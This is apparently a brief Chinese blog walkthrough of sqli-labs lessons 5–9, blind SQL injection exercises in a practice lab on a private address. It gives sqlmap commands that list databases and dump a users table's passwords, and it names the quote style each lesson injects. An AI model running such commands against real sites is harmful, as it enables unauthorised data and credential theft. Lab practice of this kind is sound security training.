没什么心情详细写了,都是基于时间和bool的盲注,交给sqlmap来跑把。
less5:
执行“sqlmap -u "http://192.168.67.1/sqli/less-5/?id=1" --batch -D security -T users -C id,password,username --dump”来拉去数据就好了。
要研究的话执行,“sqlmap -u "http://192.168.67.1/sqli/less-5/?id=1" --batch --dbs ”, 得到
得到注入点在id这,注入方式就是单引号注入。接下来想干什么就可以参考less1-4的sqlmap跑法,或者查看sqlmap使用手册,“https://www.cnblogs.com/gg472074534/articles/11333406.html”。
less6:
类似操作,得到双引号注入。
less7:
一样,得到单引号+括号的注入方式
less8:这个和less5的区别是,注入连错误返回都没了,不过无所谓,对sqlmap来说多花点时间就好了,不在此处多试一遍了。
less9:这个和less6的区别是,注入连错误返回都没了,不过无所谓,对sqlmap来说多花点时间就好了,不在此处多试一遍了。